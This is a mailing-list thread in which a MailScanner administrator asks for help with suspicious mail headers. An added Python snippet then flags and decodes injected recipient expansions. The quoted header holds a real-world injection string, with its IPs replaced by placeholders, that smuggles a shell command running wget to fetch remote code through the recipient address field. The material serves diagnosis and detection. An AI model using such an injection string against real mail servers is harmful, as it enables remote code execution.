possible attack against MailScanner ?

Shawn Iverson iversons at rushville.k12.in.us
Mon Jul 15 11:15:09 UTC 2019


Is that the start of a cron script in the email address field?

If so, you need to fix that.

On Mon, Jul 15, 2019 at 6:59 AM Heino Backhaus <heino.backhaus at fink-computer.de> wrote:

> Hello List,
>
> I need some help analysing the following email, which I received last week.
>
> Mailwatch Mail-Metadata:
>
> Received: from sab.com (unknown [46.22.132.94])
>      by mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD
>      for <root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*
> x22}}@mailscanner.mydomain.local>; Thu, 11 Jul 2019 19:34:58 +0200 (CEST)
> Received: 1
> Received: 2
> Received: 3
> Received: 4
> Received: 5
> Received: 6
> Received: 7
> Received: 8
> Received: 9
> Received: 10
> Received: 11
> Received: 12
> Received: 13
> Received: 14
> Received: 15
> Received: 16
> Received: 17
> Received: 18
> Received: 19
> Received: 20
> Received: 21
> Received: 22
> Received: 23
> Received: 24
> Received: 25
> Received: 26
> Received: 27
> Received: 28
> Received: 29
> Received: 30
> Received: 31
>
>
>
> IP1: *199.204.214.40* changed to *1.2.3.4* to disarm this...just in
> case...
> IP2: *87.138.227.107* changed to *5.6.7.8* to disarm this...just in
> case...
>
> Versions:
> MailWatch Version: 1.2.9
> OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
> Postfix Version: 3.1.0
> MailScanner Version: 5.1.2
> ClamAV Version: 0.102.0-devel-20190715
> SpamAssassin Version: 3.4.2
> PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org+1
> MySQL Version: 5.7.26-0ubuntu0.16.04.1
>
> Can you help me bring some light into this darkness...
>
> --
> Kind regards
>
> H. Backhaus
>
> Fink-Computer Systeme
> Heggrabenstr. 9, 35435 Wettenberg
> Email: heino.backhaus at fink-computer.de
> Web: www.fink-computer.de
> Fax: +49-641-98444638
> Fon: +49-641-98444640
> UST-ID: DE151040770
> HRB: 2143 Gießen
> GF: Fredi Fink
>
> I was gratified to be able to answer promptly, and I did.
> I said I didn't know.
>  Mark Twain
>
>
> --
> This e-mail was scanned for viruses and dangerous attachments
> by *MailScanner* <http://www.mailscanner.info/> and is
> probably virus-free.
>
>
> --
> MailScanner mailing list
> mailscanner at lists.mailscanner.info
> http://lists.mailscanner.info/mailman/listinfo/mailscanner
>
>

-- 
Shawn Iverson, CETL
Director of Technology
Rush County Schools
765-932-3901 option 7
iversons at rushville.k12.in.us
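
Added example, not part of either message in this thread: a small Python check a mail administrator could run over stored headers to flag recipients whose local part carries a `${operator{...}}` string like the one quoted above, and to decode its escapes for triage. It assumes the escapes were originally `\xNN`, `\t` and `\n` (the quoted header shows `x2f` with no backslash); the function names, hostnames, the 192.0.2.10 address and the harmless `echo test` argument are constructed for illustration.

```python
import re

# `$`, `{` and `}` are legal RFC 5322 atext characters, so address syntax
# validation alone does not reject "${...}" in a local part; look for it explicitly.
FOR_CLAUSE = re.compile(r"\bfor\s+<([^>]+)>")
EXPANSION = re.compile(r"\$\{\s*(\w+)\s*\{(.*)\}\s*\}", re.S)
ESCAPE = re.compile(r"\\(x[0-9A-Fa-f]{2}|t|n)")

def _unescape(m):
    tok = m.group(1)
    return chr(int(tok[1:], 16)) if tok[0] == "x" else {"t": "\t", "n": "\n"}[tok]

def inspect_recipient(addr):
    """Return a finding if the local part carries ${operator{argument}}, else None."""
    local = addr.rsplit("@", 1)[0]
    if "${" not in local:
        return None
    m = EXPANSION.search(local)
    op, arg = (m.group(1), m.group(2)) if m else (None, "")
    # Assumption: the argument uses \xNN, \t, \n escapes; decode them for the analyst.
    return {"recipient": addr, "operator": op, "argument": ESCAPE.sub(_unescape, arg)}

def scan_headers(raw):
    """Unfold headers, then inspect every 'for <rcpt>' clause in Received lines."""
    unfolded = re.sub(r"\r?\n[ \t]+", " ", raw)
    hits = []
    for line in unfolded.splitlines():
        if line.lower().startswith("received:"):
            hits += [h for h in map(inspect_recipient, FOR_CLAUSE.findall(line)) if h]
    return hits

# Constructed sample headers (documentation hosts and address, harmless argument).
SAMPLE = (
    "Received: from mail.example.org (unknown [192.0.2.10])\n"
    "\tby mx.example.net (Postfix) with SMTP id 0000000000\n"
    "\tfor <root+${run{\\x2fbin\\x2fsh\\t-c\\t\\x22echo\\x20test\\x22}}@mx.example.net>;\n"
    "\tThu, 11 Jul 2019 19:34:58 +0200 (CEST)\n"
    "Received: from mail.example.org (unknown [192.0.2.10])\n"
    "\tby mx.example.net (Postfix) with SMTP id 0000000001\n"
    "\tfor <alice+lists@mx.example.net>; Thu, 11 Jul 2019 19:35:10 +0200 (CEST)\n"
)

if __name__ == "__main__":
    for hit in scan_headers(SAMPLE):
        print(hit["operator"], repr(hit["argument"]), "<-", hit["recipient"])
```

A recipient whose backslashes were stripped in transit or display is still flagged, but its argument is reported undecoded.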
